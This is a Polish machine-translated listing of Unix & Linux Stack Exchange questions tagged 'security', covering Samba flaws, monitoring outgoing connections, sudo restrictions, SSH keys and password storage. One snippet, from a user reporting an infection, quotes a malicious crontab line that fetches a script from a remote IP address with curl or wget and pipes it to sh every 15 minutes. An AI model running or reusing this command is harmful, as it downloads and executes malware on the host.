Pytania otagowane jako security

Niezbędne treści związane z bezpieczeństwem komputerowym, tj. Treści dotyczące zasad, mechanizmów itp. Zapewniają, że dane nie wyciekają ani nie są uszkodzone, a usługi są dostępne we wszystkich okolicznościach.


2
„WannaCry” w systemach Linux: jak się zabezpieczyć?
Zgodnie z artykułem rapid7 istnieje kilka wrażliwych wersji Samby umożliwiających zdalne wykonanie kodu w systemach Linux: Podczas gdy ransomworm WannaCry wpłynął na systemy Windows i był łatwy do zidentyfikowania, przy wyraźnych krokach naprawczych, luka w Sambie wpłynie na systemy Linux i Unix i może stanowić poważne techniczne przeszkody w uzyskaniu …

7
Jak mogę monitorować wszystkie wychodzące żądania / połączenia z mojego komputera?
Moja maszyna jest serwerem, więc chcę zignorować połączenia z moim serwerem (np. Gdy ktoś odwiedza moją stronę internetową). Chcę, aby mój serwer wysyłał tylko połączenia / żądania do innych miejsc. Jak wyświetlić tylko te połączenia wychodzące? EDYCJA: Jestem nowy w tego typu rzeczach. Próbuję tylko sprawdzić, czy wysyłane są cokolwiek …

3
W jaki sposób curl chroni hasło przed pojawieniem się na wyjściu ps?
Jakiś czas temu zauważyłem, że nazwy użytkowników i hasła podane curljako argumenty wiersza poleceń nie pojawiają się w psdanych wyjściowych (chociaż oczywiście mogą pojawiać się w twojej historii bashów). Podobnie nie pojawiają się w /proc/PID/cmdline. (Można jednak określić długość połączonego argumentu nazwa użytkownika / hasło.) Pokaz poniżej: [root@localhost ~]# nc …

18
Dostęp root, który nie może zmienić hasła roota?
Mamy mały problem na serwerze. Chcemy, aby niektórzy użytkownicy mogli np. Być sudorootem, ale z zastrzeżeniem, że użytkownik nie może zmienić hasła roota. Oznacza to, że nadal możemy zalogować się na tym serwerze i zostać rootem bez względu na to, co zrobią inni użytkownicy. Czy to jest możliwe?
66 ubuntu  security  sudo 


2
Czy bezpiecznie jest wydać mój klucz publiczny SSH do pracy?
Obecnie pracuję zdalnie dla wielu organizacji, które wymagają regularnego uzyskiwania dostępu do swoich serwerów w celu konserwacji i aktualizacji. Czy mogę bezpiecznie dodać mój publiczny klucz SSH RSA do .ssh/authorized_keyspliku, aby umożliwić mi znacznie szybsze logowanie / bez konieczności wyszukiwania haseł? Działam przy założeniu, że wygenerowanie klucza prywatnego z klucza …

4
Przeniesienie / var, / home do oddzielnej partycji
Po przeczytaniu tego przewodnika próbuję przenieść niektóre foldery (takie jak /vari /home) na osobną partycję: 3.2.1 Wybierz inteligentny schemat partycji Udało mi się przenieść jeden folder z powodzeniem zgodnie z tym przewodnikiem. Jednak wydaje się, że to nie działa w przypadku wielu folderów, a wszystkie moje foldery są zrzucane na …

2
Podejrzany wpis w crontabie uruchamiający „xribfa4” co 15 minut
Chciałem dodać coś do mojego głównego pliku crontab na moim Raspberry Pi i znalazłem wpis, który wydaje mi się podejrzany, szukając części tego w Google nic nie znalazłem. Wpis Crontab: */15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh Zawartość http://103.219.112.66:8000/i.shto: export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin mkdir …
59 security  cron  malware 

2
Co oznacza opcja Chromium `--no-sandbox`?
Używam Chromium tak: chromium --no-sandbox Robię to, ponieważ uruchamiam Debian Squeeze na kontenerze VM OpenVZ i jest to jedyny sposób, w jaki mogę go uruchomić. Chociaż wciąż czytam, to jest okropne . Ale chcę wiedzieć, dlaczego dokładnie. Czy ktoś może mi to wytłumaczyć? Czy ktoś musi włamać się do komputera, …


5
Mutt: jak bezpiecznie przechowywać hasło?
Mój plik .muttrc wygląda coś jak ten jeden lub zobacz poniżej spojrzenie. Waham się z hasłem. Jak przechowywać hasło, aby z niego korzystać mutt? set imap_user = "username@gmail.com" set imap_pass = "password" set smtp_url = "smtp://username@smtp.gmail.com:587/" set smtp_pass = "password" set from = "username@gmail.com" set realname = "Your Real Name"
52 security  mutt 

3
Konwertuj klucz Amazon .pem na Putty .ppk klucz Linux
Wygenerowałem i pobrałem .pemklucz prywatny z AWS. Jednak aby użyć Putty do połączenia z maszyną wirtualną, muszę mieć ten klucz w .ppkformacie. Proces konwersji opisano szczegółowo w około 20 wierszach: http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/get-set-up-for-amazon-ec2.html#prepare-for-putty Używam Linux Mint (dystrybucja Ubuntu) i wiem, że mogę używać puttygen w terminalu. Nie mam jednak pojęcia, jak korzystać …

2
Jak rozpoznać proces, który nie ma pid?
Mam proces, który nasłuchuje 2 portów: 45136 / tcp i 37208 / udp (w rzeczywistości zakładam, że jest to ten sam proces). Ale netstat nie zwraca żadnego pid: netstat -antlp | grep 45136 tcp 0 0 0.0.0.0:45136 0.0.0.0:* LISTEN - Ten sam wynik z „grep 37208”. Próbowałem też lsof: lsof …


Korzystając z naszej strony potwierdzasz, że przeczytałeś(-aś) i rozumiesz nasze zasady używania plików cookie i zasady ochrony prywatności.
Licensed under cc by-sa 3.0 with attribution required.